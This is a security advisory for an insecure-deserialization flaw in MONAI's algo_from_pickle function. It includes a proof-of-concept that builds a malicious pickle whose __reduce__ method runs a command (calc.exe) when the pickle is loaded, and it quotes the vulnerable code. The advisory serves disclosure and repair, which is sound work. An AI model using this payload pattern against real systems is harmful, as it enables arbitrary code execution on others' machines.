PT-2026-33562 · Pypi · Monai
Published
2026-04-07
·
Updated
2026-04-07
CVSS v3.1
7.6
High
| Vector | AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H |
Summary
The
algo from pickle function in monai/auto3dseg/utils.py causes pickle.loads(data bytes) to be executed, and it does not perform any validation on the input parameters. This ultimately leads to insecure deserialization and can result in code execution vulnerabilities.Details
poc
import pickle
import subprocess
class MaliciousAlgo:
def reduce (self):
return (subprocess.call, (['calc.exe'],))
malicious algo bytes = pickle.dumps(MaliciousAlgo())
attack data = {
"algo bytes": malicious algo bytes,
}
attack pickle file = "attack algo.pkl"
with open(attack pickle file, "wb") as f:
f.write(pickle.dumps(attack data))
Generate the malicious file "attack algo.pkl" through POC.
from monai.auto3dseg.utils import algo from pickle
attack pickle file = "attack algo.pkl"
result = algo from pickle(attack pickle file)Ultimately, it will trigger pickle.load through a file to identify the command execution.
Causes of the vulnerability:
def algo from pickle(pkl filename: str, template path: PathLike | None = None, **kwargs: Any) -> Any:
with open(pkl filename, "rb") as f pi:
data bytes = f pi.read()
data = pickle.loads(data bytes)
Impact
Arbitrary code execution
Repair suggestions
Verify the data source and content before deserializing, or use a safe deserialization method
Fix
Deserialization of Untrusted Data
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Monai